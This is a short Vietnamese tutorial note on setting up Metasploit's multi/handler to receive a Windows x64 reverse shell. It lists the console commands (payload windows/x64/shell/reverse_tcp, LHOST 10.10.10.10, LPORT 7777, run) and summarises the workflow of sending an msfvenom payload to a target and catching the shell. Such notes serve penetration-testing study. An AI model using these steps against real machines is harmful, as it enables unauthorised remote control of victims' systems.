Module multi/handler của Metasploit giúp nhận reverse shell.

Sử dụng ở trong Metasploit Console như sau:

use multi/handler

Giả sử ta có một shell code được tạo ra bởi Metasploit Venom để gửi reverse shell cho Windows x64 đến attacking machine của chúng ta với IP là 10.10.10.10 và port là 7777.

Để nhận reverse shell tạo ra bởi shell code, ta cần phải thiết lập như sau:

  1. Thiết lập payload để nhận reverse shell. Payload này phải có cùng module với shell code ở trên. Ví dụ nếu shell code được tạo thông qua module windows/x64/shell/reverse_tcp thì payload của handler cũng phải là windows/x64/shell/reverse_tcp. Cụ thể:

    set PAYLOAD windows/x64/shell/reverse_tcp
  2. Local IP để reverse shell kết nối đến:

    set LHOST 10.10.10.10
  3. Local port để reverse shell kết nối đến:

    set LPORT 7777

Tip

Nếu bị lỗi không đủ quyền để dùng port dưới 1024 thì ta có thể chạy Metasploit với sudo.

Chạy module:

run

Có thể thêm vào flag -j nếu muốn chạy ngầm.

Sau khi shell code được thực thi ở target machine thì nó sẽ gửi reverse shell cho chúng ta. Khi đó, multi-handler sẽ nhận được và cho phép chúng ta tương tác với reverse shell.

Tóm tắt quy trình như sau:

  1. Tạo ra payload bằng Metasploit Venom và gửi đến cho target machine.
  2. Khởi chạy multi-handler với các tham số tương tự như payload.
  3. Thực thi payload ở phía target machine.
  4. Multi-handler nhận được reverse shell từ target machine.

Resources